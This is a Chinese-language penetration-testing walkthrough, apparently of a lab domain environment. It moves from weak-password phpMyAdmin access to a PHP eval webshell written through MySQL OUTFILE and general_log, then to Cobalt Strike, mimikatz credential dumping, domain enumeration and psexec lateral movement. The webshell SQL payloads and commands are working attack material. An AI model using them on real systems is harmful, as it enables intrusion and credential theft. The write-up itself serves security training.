1、外网渗透
1.1
使用nmap扫描目标端口,结果如下:
发现目标开启了3306端口,尝试弱口令爆破。
爆破失败。
1.2
我们直接访问80端口,看到了一个php探针页面。
御剑扫描目录,结果如下:
访问phpmyadmin,弱口令root,root直接登录,尝试利用phpmyadmin来getshell。
1.3
查询绝对路径:
select @@basedir
网站的绝对路径大概率是C:/phpStudy/WWW。
我们直接尝试写入一句话:
select '<?php eval($_POST["xxx"]);?>' into outfile 'C:/phpStudy/WWW/1.php';
发现写入失败,原因是网站没有配置secure_file_priv,secure_file_priv为NULL,表示限制mysql不允许导入导出。没有具体值时,表示不对mysqld 的导入导出做限制。我们使用命令来查看:
show global variables like '%secure%';
接下来我们可以通过写日志的方式进行getshell
Payload:
set global general_log='ON';
set global general_log_file='C:/phpStudy/WWW/1.php';
SELECT '<?php @eval($_POST[xxx]);?>'
成功执行截图如下:
我们使用蚁剑连接,成功getshell:
2、内网渗透
2.1
利用powershell command上线cs:
whoami看到当前的web服务器处于域(god)中,且为管理员权限。
2.2
systeminfo信息如下:
利用mimiktz得到域管的明文密码:
使用net view查看域内其他主机,这里得到的IP地址有问题,正常应该是192.168.52.x,不过不影响最终我们横向移动。
net user /doamin #查询域内其他用户
net group "domain admins" /domain #查询所有域管
net group "domain controllers" /domain #查域控
2.3 横向移动,使用psexec
另一台主机同理,最终效果如下: